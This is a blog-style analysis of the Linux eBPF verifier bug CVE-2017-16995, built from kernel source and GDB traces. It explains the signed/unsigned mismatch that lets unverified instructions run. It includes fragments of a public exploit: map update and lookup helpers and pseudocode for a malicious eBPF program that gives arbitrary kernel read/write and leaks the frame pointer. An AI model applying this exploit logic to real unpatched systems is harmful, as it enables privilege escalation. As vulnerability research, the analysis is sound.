Analysis on CVE-2017-16995

Introduction

In this post, I will give a detailed explanation on the exploit development of CVE-2017-16995. This post is based on [1][2][3] and give more debugging information for a better understanding. This post will be divided into 3 parts. Part I will discuss what is eBPF, the basic data structure used in eBPF and how the the eBPF program given in exploit in [1] should be interpreted. Part II will give the analysis on the root cause of this vulnerability. Part III will explain how the exploit is developed, from arbitrary read/write to privilege escalation.

Testing Environment

This test is carried on Linux_kernel-4.4.33[4], which is built with CONFIG_BPF and CONFIG_DEBUG_INFO. The image file is created with the same method in my previous post on QEMU debug environment.
We use GDB+QEMU for debugging. Though the debugging is not easy compared to debugging on a virtual machine in VirtualBox. But it is already enough for me to get necessary information for explaining this vulnerability.

extended BPF

In my previous posts, we explain what is BPF (Berkerly Packet Filter), which is also called cBPF (classical BPF). In this post, I will talk about eBPF (extended BPF). eBPF reuses some of the macros defined for cBPF, but it also extends its instruction set to implements more operations. To support those operations, eBPF also uses different data structures from cBPF.
The core data structure is struct bpf_insn as below:

struct bpf_insn {
	__u8	code;		/* opcode */
	__u8	dst_reg:4;	/* dest register */
	__u8	src_reg:4;	/* source register */
	__s16	off;		/* signed offset */
	__s32	imm;		/* signed immediate constant */
};

In eBPF, the struct bpf_insn is a 8-byte value. [0-7] bit denote the opcode of the instruction. [8-11] bit denote the destination register, [12-15] bit denote the source register, [16-31] bit denote the offset value used for operation and [32-63] bit denote the immediate value used for operation.

The functions that run the eBPF program are mostly located in kernel/bpf/core.c. According to the macros given in the file, there are 11 available registers for eBPF instruction.

/*
 * All registers are 64-bit.
 * R0 - return register
 * R1-R5 argument passing registers
 * R6-R9 callee saved registers
 * R10 - frame pointer read-only
 */

/* Registers */
#define BPF_R0	regs[BPF_REG_0]
#define BPF_R1	regs[BPF_REG_1]
#define BPF_R2	regs[BPF_REG_2]
#define BPF_R3	regs[BPF_REG_3]
#define BPF_R4	regs[BPF_REG_4]
#define BPF_R5	regs[BPF_REG_5]
#define BPF_R6	regs[BPF_REG_6]
#define BPF_R7	regs[BPF_REG_7]
#define BPF_R8	regs[BPF_REG_8]
#define BPF_R9	regs[BPF_REG_9]
#define BPF_R10	regs[BPF_REG_10]

/* Named registers */
#define DST	regs[insn->dst_reg]
#define SRC	regs[insn->src_reg]
#define FP	regs[BPF_REG_FP]
#define ARG1	regs[BPF_REG_ARG1]
#define CTX	regs[BPF_REG_CTX]
#define IMM	insn->imm

According to the comments in core.c, we can know the basic usage of those registers:

JMP_CALL:
	/* Function call scratches BPF_R1-BPF_R5 registers,
	 * preserves BPF_R6-BPF_R9, and stores return value
	 * into BPF_R0.
	 */
	BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3, BPF_R4, BPF_R5);
	CONT;

To understand what’s the meaning of the bytecode sequeces given in [1], I write an auxiliary program to translate the eBPF byte code to readable code. The program is given in [5].
The picture below gives the disassembled program on the bytecode.

Pic 1. The ebpf programme

One thing to note is that, in [2] and [3] the authors all think that there are 41 instructions in the eBPF program, but there are only 40 instruction instead. There exists one very special case for opcode 0x18 (BPF_LD|BPF_IMM|BPF_DW), its implementation code in kernel/bpf/core.c is given below:

#define CONT	 ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

LD_IMM_DW:
	DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
	insn++;
	CONT;

Therefore, for instruction started with LD_IMM_DW, it actually takes 16 bytes rather than 8 bytes.

Next we are going to discuss how this eBPF code results in EoP.

Vulnerability Analysis

This section will discuss the root cause of this vulnerability. Root cause of the vulnerability will involve two critical functions in bpf module: bpf_check in kernel/bpf/verifier.c and __bpf_prog_run in kernel/bpf/verifier.c.

__bpf_prog_run is the function to emulate the operation of eBPF program with given registers and memory layout. This is the function we use to gain arbitrary read/write primitives during exploit.
bpf_check is the function to check the validity of the eBPF program given from user space. The comments given in /kernel/bpf/verifier.c give the usage of bpf_check function.

/* bpf_check() is a static code analyzer that walks eBPF program
 * instruction by instruction and updates register/stack state.
 * All paths of conditional branches are analyzed until 'bpf_exit' insn.
 *
 * The first pass is depth-first-search to check that the program is a DAG.
 * It rejects the following programs:
 * - larger than BPF_MAXINSNS insns
 * - if loop is present (detected via back-edge)
 * - unreachable insns exist (shouldn't be a forest. program = one function)
 * - out of bounds or malformed jumps
 * The second pass is all possible path descent from the 1st insn.
 * Since it's analyzing all pathes through the program, the length of the
 * analysis is limited to 32k insn, which may be hit even if total number of
 * insn is less then 4K, but there are too many branches that change stack/regs.
 * Number of 'branches to be analyzed' is limited to 1k
 */

The first pass is implemented via check_cfg, this is not the function we care about in CVE-2017-16995.
The second pass is implemented via do_check, this is where the vulnerability starts. This function will check every feasible execution path in ebpf program and emulate the execution based on the program status.

Function do_check

As demonstrated in the instructions of the disassembled ebpf program, the first two instructions are:

(0) BPF_ALU|BPF_MOV|BPF_K
(1) BPF_JMP|BPF_JNE|BPF_K

I will first explain how these two instructions are processed based on source code and then I give the debugging information for a better understanding.
BPF_ALU|BPF_MOV|BPF_K
First let’s observe the code which is responsible for processing BPF_ALU instruction

if (class == BPF_ALU || class == BPF_ALU64) {
          err = check_alu_op(env, insn);
          if (err)
                  return err;
}

Soon, check_alu_op will be invoked to check the validity of the instruction.

/* check validity of 32-bit and 64-bit arithmetic operations */
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
{
       //code responsible for processing BPF_ALU|BPF_MOV|BPF_K
       else if (opcode == BPF_MOV) {
		if (BPF_SRC(insn->code) == BPF_X) {
			if (insn->imm != 0 || insn->off != 0) {
				verbose("BPF_MOV uses reserved fields\n");
				return -EINVAL;
			}

			/* check src operand */
			err = check_reg_arg(regs, insn->src_reg, SRC_OP);
			if (err)
				return err;
		} else {
			if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
				verbose("BPF_MOV uses reserved fields\n");
				return -EINVAL;
			}
		}

		/* check dest operand */
		err = check_reg_arg(regs, insn->dst_reg, DST_OP);
		if (err)
			return err;

		if (BPF_SRC(insn->code) == BPF_X) {
			if (BPF_CLASS(insn->code) == BPF_ALU64) {
				/* case: R1 = R2
				 * copy register state to dest reg
				 */
				regs[insn->dst_reg] = regs[insn->src_reg];
			} else {
				if (is_pointer_value(env, insn->src_reg)) {
					verbose("R%d partial copy of pointer\n",
						insn->src_reg);
					return -EACCES;
				}
				regs[insn->dst_reg].type = UNKNOWN_VALUE;
				regs[insn->dst_reg].map_ptr = NULL;
			}
		} else {
			/* case: R = imm
			 * remember the value we stored into this reg
			 */
			regs[insn->dst_reg].type = CONST_IMM;
			regs[insn->dst_reg].imm = insn->imm;
		}
       }
}

In eBPF, BPF_K denotes the the source value is from an immediate value, BPF_X denotes that the source value is from a register. From code given above, we can observe that the last two statements are responsible for case of BPF_K.

struct reg_state {
	enum bpf_reg_type type;
	union {
		/* valid when type == CONST_IMM | PTR_TO_STACK */
		int imm;

		/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
		 *   PTR_TO_MAP_VALUE_OR_NULL
		 */
		struct bpf_map *map_ptr;
	};
};
//declaration of regs
struct reg_state *regs = state->regs

//usage of regs
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;

Here, we can see that the immediate value is retrieved from the instruction and is stored into the corresponding reg_state. Note that here regs[insn->dst_reg].imm and insn->imm are both signed integer value.

BPF_JUMP|BPF_JNE|BPF_K
Then we come to the second instruction, for this instruction, do_check has to decide which branch to take. In the Breath-first-search, both branches should be taken into consideration. However, in do_check, it will emulate the execution status of the program to reduce the search paths. Now, let’s read the code.

else if (class == BPF_JMP) {
        u8 opcode = BPF_OP(insn->code);
        if (opcode == BPF_CALL) {
               //some code
        }
        else if (opcode == BPF_JA) {
               //some code
        }
        else if (opcode == BPF_EXIT) {
               //some code
        }else {
               err = check_cond_jmp_op(env, insn, &insn_idx);
               if (err)
                        return err;
        }
}

We can find that check_cond_jmp_op is responsible for the deciding which branch to take next.The we can quickly locate the key code as below:

if (BPF_SRC(insn->code) == BPF_K &&
            (opcode == BPF_JEQ || opcode == BPF_JNE) &&
            regs[insn->dst_reg].type == CONST_IMM &&
            regs[insn->dst_reg].imm == insn->imm) {
                if (opcode == BPF_JEQ) {
                        /* if (imm == imm) goto pc+off;
                         * only follow the goto, ignore fall-through
                         */
                        *insn_idx += insn->off;
                        return 0;
                } else {
                        /* if (imm != imm) goto pc+off;
                         * only follow fall-through branch, since
			 * that's where the program will go
			 */
			return 0;
		}
	}

We can observe that in this situation, check_cond_jmp_op will emulate the bpf program execution. At this point, it is still comparing two signed integer. Based on the source value given in the ebpf program, the fall-through instruction will be taken and the other branch will be ignored. In my final exploit, I try to print the print the bpf instructions, but only first four instructions are printed out.

0: (b4) (u32) r9 = (u32) -1
1: (55) if r9 != 0xffffffff goto pc+2
2: (b7) r0 = 0
3: (95) exit

The critical point about this one is that the verifier believes that only the fall-through branch is taken and the other 36 instructions are left unverified.
With proper breakpoint setting and a few effort of reverse engineering, we can get the following output from debugger:

Breakpoint 1 at 0xffffffff81112e10: file kernel/bpf/verifier.c, line 1168.
Breakpoint 2 at 0xffffffff81112e20: file kernel/bpf/verifier.c, line 1168.
Breakpoint 3 at 0xffffffff8111318e: file kernel/bpf/verifier.c, line 1219.

Breakpoint 1, check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1168
1168				regs[insn->dst_reg].imm = insn->imm;
$1 = 0xffffc90000a8f028
0xffffc90000a8f028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000a8f038:	0x00000000000000b7	0x0000000000000095
=> 0xffffffff81112e10 <bpf_check+7024>:	movzbl 0x1(%r13),%eax
   0xffffffff81112e15 <bpf_check+7029>:	mov    0x4(%r13),%edx
   0xffffffff81112e19 <bpf_check+7033>:	and    $0xf,%eax
   0xffffffff81112e1c <bpf_check+7036>:	shl    $0x4,%rax
   0xffffffff81112e20 <bpf_check+7040>:	mov    %edx,0x8(%rbx,%rax,1)

Breakpoint 2, 0xffffffff81112e20 in check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1168
1168				regs[insn->dst_reg].imm = insn->imm;
=> 0xffffffff81112e20 <bpf_check+7040>:	mov    %edx,0x8(%rbx,%rax,1)
$2 = 0xffffffff

Breakpoint 3, 0xffffffff8111318e in check_cond_jmp_op (insn_idx=<optimized out>, insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1219
1219		    regs[insn->dst_reg].type == CONST_IMM &&
=> 0xffffffff8111318e <bpf_check+7918>:	cmp    %ecx,0x8(%rax)
   0xffffffff81113191 <bpf_check+7921>:	jne    0xffffffff81112cbc <bpf_check+6684>
   0xffffffff81113197 <bpf_check+7927>:	cmpb   $0x10,-0x78(%rbp)
   0xffffffff8111319b <bpf_check+7931>:	jne    0xffffffff81111edf <bpf_check+3135>
rcx            0xffffffff	0xffffffff
$3 = 0xffff88007b9e70a8
0xffff88007b9e70a8:	0x0000000000000008	0x00000000ffffffff

At breakpoint 1, we can observe that it has started to process the byte sequence 0xffffc90000a8f028.
At breakpoint 2, it moves a 32-bit value into the corresponding register.
At breakpoint 3, the value in $rcx is retrieved from the instruction. $rax is a pointer to corresponding struct reg_state, whose type is CONST_IMM (0x8) and value stored in is 0xffffffff.

Function __bpf_prog_run

The core part of function __bpf_prog_run is a large jump table shown as below:

static const void *jumptable[256] = {
	[0 ... 255] = &&default_label,
	/* Now overwrite non-defaults ... */
	/* 32 bit ALU operations */
	[BPF_ALU | BPF_ADD | BPF_X] = &&ALU_ADD_X,
	[BPF_ALU | BPF_ADD | BPF_K] = &&ALU_ADD_K,
	[BPF_ALU | BPF_SUB | BPF_X] = &&ALU_SUB_X,
	[BPF_ALU | BPF_SUB | BPF_K] = &&ALU_SUB_K,
        //more entries below
}

Based on the opcode of each instruction, the ebpf program will jump to the corresponding code snippets for further processing. Now let’s observe what happens to the first two instructions in the exploits.

#define DST	regs[insn->dst_reg]
#define SRC	regs[insn->src_reg]
#define FP	regs[BPF_REG_FP]
#define ARG1	regs[BPF_REG_ARG1]
#define CTX	regs[BPF_REG_CTX]
#define IMM	insn->imm

//definition of regs
u64 regs[MAX_BPF_REG], tmp;

//jump branch for BPF_ALU|BPF_MOV|BPF_K
ALU_MOV_K:
	DST = (u32) IMM;
	CONT;

//jump branch for BPF_JMP|BPF_JNE|BPF_K
JMP_JNE_K:
	if (DST != IMM) {
		insn += insn->off;
		CONT_JMP;
	}
	CONT;

With the information given above, we can quickly locate the problematic code. regs here is different from the regs given in do_check. It is an unsigned 64-bit value.
In the first instruction (BPF_ALU|BPF_MOV|BPF_K), the int value (0xffffffff) will be first cast to an unsigned int value and then assigned to and unsigned 64-bit value, which means that the new value stored in DST is 0xffffffffffffffff.
In the second instruction (BPF_JMP|BPF_JNE|BPF_K), the value in DST is 0xffffffffffffffff, while the value in SRC is 0xffffffff. Since this is a comparison between two unsigned 64-bit value, this time the jump branch will be taken and the malicious bpf instructions will be executed.

Breakpoint 1 at 0xffffffff8110ed7a: file kernel/bpf/core.c, line 350.
Breakpoint 2 at 0xffffffff8110ed88: file kernel/bpf/core.c, line 350.
Breakpoint 3 at 0xffffffff8110e8e1: file kernel/bpf/core.c, line 496.
Breakpoint 4 at 0xffffffff8110e8ec: file kernel/bpf/core.c, line 496.

Breakpoint 1, __bpf_prog_run (ctx=0xffff88007a70d100, insn=0xffffc90000adb028) at kernel/bpf/core.c:350
350			DST = (u32) IMM;
=> 0xffffffff8110ed7a <__bpf_prog_run+3066>:	movzbl 0x1(%rbx),%eax
   0xffffffff8110ed7e <__bpf_prog_run+3070>:	mov    0x4(%rbx),%edi
   0xffffffff8110ed81 <__bpf_prog_run+3073>:	add    $0x8,%rbx
   0xffffffff8110ed85 <__bpf_prog_run+3077>:	and    $0xf,%eax
   0xffffffff8110ed88 <__bpf_prog_run+3080>:	mov    %rdi,-0x270(%rbp,%rax,8)
0xffffc90000adb028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000adb038:	0x00000000000000b7	0x0000000000000095

Breakpoint 2, 0xffffffff8110ed88 in __bpf_prog_run (ctx=<optimized out>, insn=0xffffc90000adb030) at kernel/bpf/core.c:350
350			DST = (u32) IMM;
=> 0xffffffff8110ed88 <__bpf_prog_run+3080>:	mov    %rdi,-0x270(%rbp,%rax,8)
$1 = 0xffffffff

Breakpoint 3, __bpf_prog_run (ctx=0xffffffff, insn=0xffffc90000adb030) at kernel/bpf/core.c:496
496			if (DST != IMM) {
=> 0xffffffff8110e8e1 <__bpf_prog_run+1889>:	movzbl 0x1(%rbx),%eax
   0xffffffff8110e8e5 <__bpf_prog_run+1893>:	movslq 0x4(%rbx),%rdx
   0xffffffff8110e8e9 <__bpf_prog_run+1897>:	and    $0xf,%eax
   0xffffffff8110e8ec <__bpf_prog_run+1900>:	cmp    %rdx,-0x270(%rbp,%rax,8)
   0xffffffff8110e8f4 <__bpf_prog_run+1908>:	je     0xffffffff8110f4ce <__bpf_prog_run+4942>
0xffffc90000adb030:	0xffffffff00020955	0x00000000000000b7
0xffffc90000adb040:	0x0000000000000095	0x7c521e8000000918

Breakpoint 4, 0xffffffff8110e8ec in __bpf_prog_run (ctx=0xffffffff, insn=0xffffc90000adb030) at kernel/bpf/core.c:496
496			if (DST != IMM) {
=> 0xffffffff8110e8ec <__bpf_prog_run+1900>:	cmp    %rdx,-0x270(%rbp,%rax,8)
rdx            0xffffffffffffffff	0xffffffffffffffff
rax            0x9	0x9
0xffff88007c10ba70:	0x0000000000000000	0xffff88007a70d100
0xffff88007c10ba80:	0xffffffff8114032d	0xffff88007c10ba98
0xffff88007c10ba90:	0xffffffff8114032d	0xffff88007c10bb90
0xffff88007c10baa0:	0x0000000000000246	0x0000000000000000
0xffff88007c10bab0:	0xffff88007ffdc738	0x00000000ffffffff

At breakpoint 2, we can see that it is 0xffffffff that is stored into the corresponding register.
At breakpoint 4, the time of comparison, it is 0xffffffffffffffff that is compared with 0xffffffff stored in corresponding register. And of course, the jump branch is taken and the execution flow jumps into the malicious code.

Exploit

Function replace_map_fd_with_map_ptr

Before diving into the exploit development, we need to talk about another function replace_map_fd_with_map_ptr. This function is called before the do_check in function bpf_check.

We set some breakpoint for the allocated bpf_map and first time of calling do_check

Breakpoint 1, 0xffffffff811102f7 in bpf_map_new_fd (map=<optimized out>) at kernel/bpf/syscall.c:122
122		return anon_inode_getfd("bpf-map", &bpf_map_fops, map,
$1 = 0xffff88007741d900
0xffff88007741d900:	0x0000000200000001	0x0000000800000004
0xffff88007741d910:	0x0000000100000003	0xffff88007c405e00
0xffff88007741d920:	0xffffffff81a14060	0x0000000000000000
0xffff88007741d930:	0x0000000000000000	0x0000000000000000
0xffff88007741d940:	0x0000000000000000	0x0000000000000001
0xffff88007741d950:	0x0000000000000008	0x0000000000000000
0xffff88007741d960:	0x0000000000000000	0x0000000000000000
0xffff88007741d970:	0x0000000000000000	0x0000000000000000
0xffff88007741d980:	0xffff88007741de00	0xffffffff811b78a0
$2 = {map = {refcnt = {counter = 0x1}, map_type = 0x2, key_size = 0x4, value_size = 0x8, max_entries = 0x3, pages = 0x1, user = 0xffff88007c405e00, ops = 0xffffffff81a14060, work = {data = {counter = 0x0}, entry = {next = 0x0, prev = 0x0}, func = 0x0}, usercnt = {counter = 0x1}}, elem_size = 0x8, owner_prog_type = 0x0, owner_jited = 0x0, {value = 0xffff88007741d960, ptrs = 0xffff88007741d960}}

Breakpoint 2, bpf_prog_load (attr=0xffff88007c86fee0) at kernel/bpf/syscall.c:653
653		if (!prog)
$3 = 0xffffc90000b01000

Breakpoint 3, do_check (env=<optimized out>) at kernel/bpf/verifier.c:1717
1717		insn_idx = 0;
0xffffc90000b01028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000b01038:	0x00000000000000b7	0x0000000000000095
0xffffc90000b01048:	0x7741d90000001918	0xffff880000000000
0xffffc90000b01058:	0x00000000000091bf	0x000000000000a2bf
0xffffc90000b01068:	0xfffffffc00000207	0x00000000fffc0a62
0xffffc90000b01078:	0x0000000100000085	0x0000000000010055

At this time, the instructions at 0xffffc90000b01048 and 0xffffc90000b01050 are 0x7741d90000001918 and 0xffff880000000000. The imm part of each instruction is 0x7741d900 and 0xffff8800. And the allocated bpf_map is 0xffff88007741d900, which means that the instructions are modified by the program. That’s exactly what replace_map_fd_with_map_ptr does. Let’s read the code

if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
        struct bpf_map *map;
        struct fd f;
        //some checking code
        /* store map pointer inside BPF_LD_IMM64 instruction */
        insn[0].imm = (u32) (unsigned long) map;
        insn[1].imm = ((u64) (unsigned long) map) >> 32;
}

From the code above, we can find that the 64-bit map value will be separated into two 32-bit values. The two values will be used in later exploitation.

Information Leakage: __get_fp

We list the code that is utilized to get the frame pointer in the exploit.

#define __update_elem(a, b, c) \
	bpf_update_elem(0, (a)); \
	bpf_update_elem(1, (b)); \
	bpf_update_elem(2, (c)); \
	writemsg();

static uint64_t get_value(int key) {
	uint64_t value;

	if (bpf_lookup_elem(&key, &value))
		__exit(strerror(errno));

	return value;
}

static uint64_t __get_fp(void) {
	__update_elem(1, 0, 0);
	return get_value(2);
}

To put it simple, the information leakage is divided into two steps:
Step 1: Update the array of elements in bpf_map via bpf_update_elem, and invoke writemsg to trigger the execution of the malicious ebpf program.
Step 2: Leak the value of frame pointer via bpf_lookup_elem.

I will discuss what happens in the malicious ebpf programme in next subsection. I will first discuss how the information are leaked to user space. Let’s set a breakpoint at the exit point of the programme. At this time, the malicious programme has been executed successfully and desired value has been set in bpf_map.

Breakpoint 1 at 0xffffffff811102f7: file kernel/bpf/syscall.c, line 122.
Breakpoint 2 at 0xffffffff8110f7fd: file kernel/bpf/syscall.c, line 653.
Breakpoint 3 at 0xffffffff8110e6e8: file kernel/bpf/core.c, line 562.

Breakpoint 1, 0xffffffff811102f7 in bpf_map_new_fd (map=<optimized out>) at kernel/bpf/syscall.c:122
122		return anon_inode_getfd("bpf-map", &bpf_map_fops, map,
$1 = 0xffff88007741d800
0xffff88007741d800:	0x0000000200000001	0x0000000800000004
0xffff88007741d810:	0x0000000100000003	0xffff88007c405e00
0xffff88007741d820:	0xffffffff81a14060	0x0000000000000000
0xffff88007741d830:	0x0000000000000000	0x0000000000000000
0xffff88007741d840:	0x0000000000000000	0x0000000000000001
0xffff88007741d850:	0x0000000000000008	0x0000000000000000
0xffff88007741d860:	0x0000000000000000	0x0000000000000000
0xffff88007741d870:	0x0000000000000000	0x0000000000000000
0xffff88007741d880:	0x0000000000000001	0xffff88007c9ebde8
0xffff88007741d890:	0x0000000000000000	0x0000000000000000
$2 = {map = {refcnt = {counter = 0x1}, map_type = 0x2, key_size = 0x4, value_size = 0x8, max_entries = 0x3, pages = 0x1, user = 0xffff88007c405e00, ops = 0xffffffff81a14060, work = {data = {counter = 0x0}, entry = {next = 0x0, prev = 0x0}, func = 0x0}, usercnt = {counter = 0x1}}, elem_size = 0x8, owner_prog_type = 0x0, owner_jited = 0x0, {value = 0xffff88007741d860, ptrs = 0xffff88007741d860}}

Breakpoint 2, bpf_prog_load (attr=0xffff88007c86fee0) at kernel/bpf/syscall.c:653
653		if (!prog)
$3 = 0xffffc90000b3a000

Breakpoint 3, __bpf_prog_run (ctx=0xffff88007741d800, insn=0xffffc90000b3a158) at kernel/bpf/core.c:562
562			return BPF_R0;
0xffff88007741d800:	0x0000000200000002	0x0000000800000004
0xffff88007741d810:	0x0000000100000003	0xffff88007c405e00
0xffff88007741d820:	0xffffffff81a14060	0x0000000000000000
0xffff88007741d830:	0x0000000000000000	0x0000000000000000
0xffff88007741d840:	0x0000000000000000	0x0000000000000001
0xffff88007741d850:	0x0000000000000008	0x0000000000000000
0xffff88007741d860:	0x0000000000000001	0x0000000000000000
0xffff88007741d870:	0xffff88007c86fcc8	0x0000000000000000
0xffff88007741d880:	0x0000000000000001	0xffff88007c9ebde8
0xffff88007741d890:	0x0000000000000000	0x0000000000000000
$4 = {map = {refcnt = {counter = 0x2}, map_type = 0x2, key_size = 0x4, value_size = 0x8, max_entries = 0x3, pages = 0x1, user = 0xffff88007c405e00, ops = 0xffffffff81a14060, work = {data = {counter = 0x0}, entry = {next = 0x0, prev = 0x0}, func = 0x0}, usercnt = {counter = 0x1}}, elem_size = 0x8, owner_prog_type = 0x0, owner_jited = 0x0, {value = 0xffff88007741d860, ptrs = 0xffff88007741d860}}
(gdb) x/20gx $3+0x28
0xffffc90000b3a028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000b3a038:	0x00000000000000b7	0x0000000000000095
0xffffc90000b3a048:	0x7741d80000000918	0xffff880000000000
0xffffc90000b3a058:	0x00000000000091bf	0x000000000000a2bf
0xffffc90000b3a068:	0xfffffffc00000207	0x00000000fffc0a62
0xffffc90000b3a078:	0x00005d1000000085	0x0000000000010055
0xffffc90000b3a088:	0x0000000000000095	0x0000000000000679
0xffffc90000b3a098:	0x00000000000091bf	0x000000000000a2bf
0xffffc90000b3a0a8:	0xfffffffc00000207	0x00000001fffc0a62
0xffffc90000b3a0b8:	0x00005d1000000085	0x0000000000010055
(gdb) x/20gx $rbp-0x270
0xffff88007c86fa70:	0x0000000000000000	0xffff88007741d800
0xffff88007c86fa80:	0xffff88007741d870	0xffff88007c86fa98
0xffff88007c86fa90:	0xffffffff8114032d	0xffff88007c86fb90
0xffff88007c86faa0:	0x0000000000000001	0x0000000000000000
0xffff88007c86fab0:	0x0000000000000000	0xffff88007741d800
0xffff88007c86fac0:	0xffff88007c86fcc8(R10)	0xffff88007ffdc600
0xffff88007c86fad0:	0xffff88007ffdc6f0	0x0000000000000000
0xffff88007c86fae0:	0x0000000000000138	0x00000000000000f0
0xffff88007c86faf0:	0x00000000000000c0	0xffff88007fc18aa0
0xffff88007c86fb00:	0xffff88007c86fc68	0xffff88007fc18aa0
(gdb) x/8gx $rbx
0xffffc90000b3a158:	0x0000000000000095	0x000000000000877b
0xffffc90000b3a168:	0x0000000000000095	0x0000000000000000
0xffffc90000b3a178:	0x0000000000000000	0x0000000000000000
0xffffc90000b3a188:	0x0000000000000000	0x0000000000000000

At breakpoint 1, we know that a bpf_map of size 3 is created at 0xffff88007741d800, whose value is 0xffff88007741d860.
At breakpoint 3, at the exit point of the bpf program we can find that value at 0xffff88007741d870 has been modified to 0xffff88007c86fcc8. After checking the status of the registers, we find that 0xffff88007c86fcc8 is exactly the value in R10, which plays as the frame pointer in bpf programme.

With those knowledge in mind, let’s set how value in R10 is leaked into user space via map_lookup_elem.

With some debugging trial, we can quickly find the function that finally does these operation

Breakpoint 4, 0xffffffff81110487 in map_update_elem (attr=<optimized out>) at kernel/bpf/syscall.c:321
321		err = map->ops->map_update_elem(map, key, value, attr->flags);
=> 0xffffffff81110487 <SyS_bpf+1767>:	callq  *0x20(%rax)
   0xffffffff81114790 <array_map_update_elem>:	cmp    $0x2,%rcx

Breakpoint 5, 0xffffffff81110209 in map_lookup_elem (attr=<optimized out>) at kernel/bpf/syscall.c:255
255		ptr = map->ops->map_lookup_elem(map, key);
=> 0xffffffff81110209 <SyS_bpf+1129>:	callq  *0x18(%rax)
   0xffffffff811146e0 <array_map_lookup_elem>:	mov    (%rsi),%eax

The code of array_map_lookup_elem and array_map_update_elem is simple and straightforward.

/* Called from syscall or from eBPF program */
static int array_map_update_elem(struct bpf_map *map, void *key, void *value,
				 u64 map_flags)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = *(u32 *)key;

	if (map_flags > BPF_EXIST)
		/* unknown flags */
		return -EINVAL;

	if (index >= array->map.max_entries)
		/* all elements were pre-allocated, cannot insert a new one */
		return -E2BIG;

	if (map_flags == BPF_NOEXIST)
		/* all elements already exist */
		return -EEXIST;

	memcpy(array->value + array->elem_size * index, value, map->value_size);
	return 0;
}

static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = *(u32 *)key;

	if (index >= array->map.max_entries)
		return NULL;

	return array->value + array->elem_size * index;
}

Here I will only use the binary code of array_map_lookup_elem to explain how we leak R10 in the end. But the same story goes for array_map_update_elem.

(gdb) disassemble 0xffffffff811146e0
Dump of assembler code for function array_map_lookup_elem:
   0xffffffff811146e0 <+0>:	mov    (%rsi),%eax
   0xffffffff811146e2 <+2>:	cmp    %eax,0x10(%rdi)
   0xffffffff811146e5 <+5>:	push   %rbp
   0xffffffff811146e6 <+6>:	mov    %rsp,%rbp
   0xffffffff811146e9 <+9>:	jbe    0xffffffff811146f6 <array_map_lookup_elem+22>
   0xffffffff811146eb <+11>:	imul   0x50(%rdi),%eax
   0xffffffff811146ef <+15>:	pop    %rbp
   0xffffffff811146f0 <+16>:	lea    0x60(%rdi,%rax,1),%rax
   0xffffffff811146f5 <+21>:	retq   
   0xffffffff811146f6 <+22>:	xor    %eax,%eax
   0xffffffff811146f8 <+24>:	pop    %rbp
   0xffffffff811146f9 <+25>:	retq   
End of assembler dump.

With some debugging work, we can read the necessary information as below:

Breakpoint 6, array_map_lookup_elem (map=0xffff88007c65df00, key=0xffff88007bad7010) at kernel/bpf/arraymap.c:73
73		return array->value + array->elem_size * index;
=> 0xffffffff811146f0 <array_map_lookup_elem+16>:	lea    0x60(%rdi,%rax,1),%rax
rdi            0xffff88007c65df00	0xffff88007c65df00
rax            0x10	0x10
0xffff88007c65df00:	0x0000000200000002	0x0000000800000004
0xffff88007c65df10:	0x0000000100000003	0xffff88007c405e00
0xffff88007c65df20:	0xffffffff81a14060	0x0000000000000000
0xffff88007c65df30:	0x0000000000000000	0x0000000000000000
0xffff88007c65df40:	0x0000000000000000	0x0000000000000001
0xffff88007c65df50:	0x0000000000000008	0x0000000000000000
0xffff88007c65df60:	0x0000000000000001	0x0000000000000000
0xffff88007c65df70:	0xffff88007a41bcc8	0x0000000000000000
0xffff88007c65df80:	0xffffc900007db000	0xffffc900007df000
0xffff88007c65df90:	0x0000000000000001	0xffff88007c65de99

After this instruction, a pointer with value 0xffff88007c65df70 will be returned and the value at this location will be fetched and returned to user space.
The next steps for the attacker is to repeat the steps above and save the address.

Data-oriented programming: ebpf programme

Now let’s discuss the what happens in the malicious ebpf programme.
First of all, let me translate the ebpf programme in the Pic 1. into a readable code

R1 = bpf_map;
R2 = R10;
R2 = R2 - 4;
*(R10-4) = 0;
R0 = call ebpf_map_lookup_elem(R1, R2); // R1 is pointer to bpf_map, *R2 is 0
if(R0 == 0)
     JUMP_EXIT
R6 = *R0

R1 = bpf_map;
R2 = R10;
R2 = R2 - 4;
*(R10-4) = 1;
R0 = call ebpf_map_lookup_elem(R1, R2); // R1 is pointer to bpf_map, *R2 is 1
if(R0 == 0)
     JUMP_EXIT
R7 = *R0

R1 = bpf_map;
R2 = R10;
R2 = R2 - 4;
*(R10-4) = 2;
R0 = call bpf_map_lookup_elem(R1, R2); // R1 is pointer to bpf_map, *R2 is 2
if(R0 == 0)
     JUMP_EXIT
R8 = *R0

R2 = R0;
R0 = 0;

if(R6 == 0)
{
      R3 = *(R7);
      *R2 = R3;
}
else if(R6 == 1)
{
      *R2 = R10;
}
else if(R6 == 2)
{
      *(R7) = R8;
}

Now let’s recall what happens before getting the frame_pointer via bpf_map_lookup_elem.

#define __update_elem(a, b, c) \
	bpf_update_elem(0, (a)); \
	bpf_update_elem(1, (b)); \
	bpf_update_elem(2, (c)); \
	writemsg();

//call __updage_elem(1, 0, 0) before calling fp_get()
__update_elem(1, 0, 0);

According to our analysis on bpf_map, it contains an array of size 3 and elements in this array are set according to the function bpf_update_elem. The ebpf programme takes different operations based on the set value and achive arbitrary read/write in the end.
Based on the pseudo code given above, we can generalise the logic of the ebpf programme.
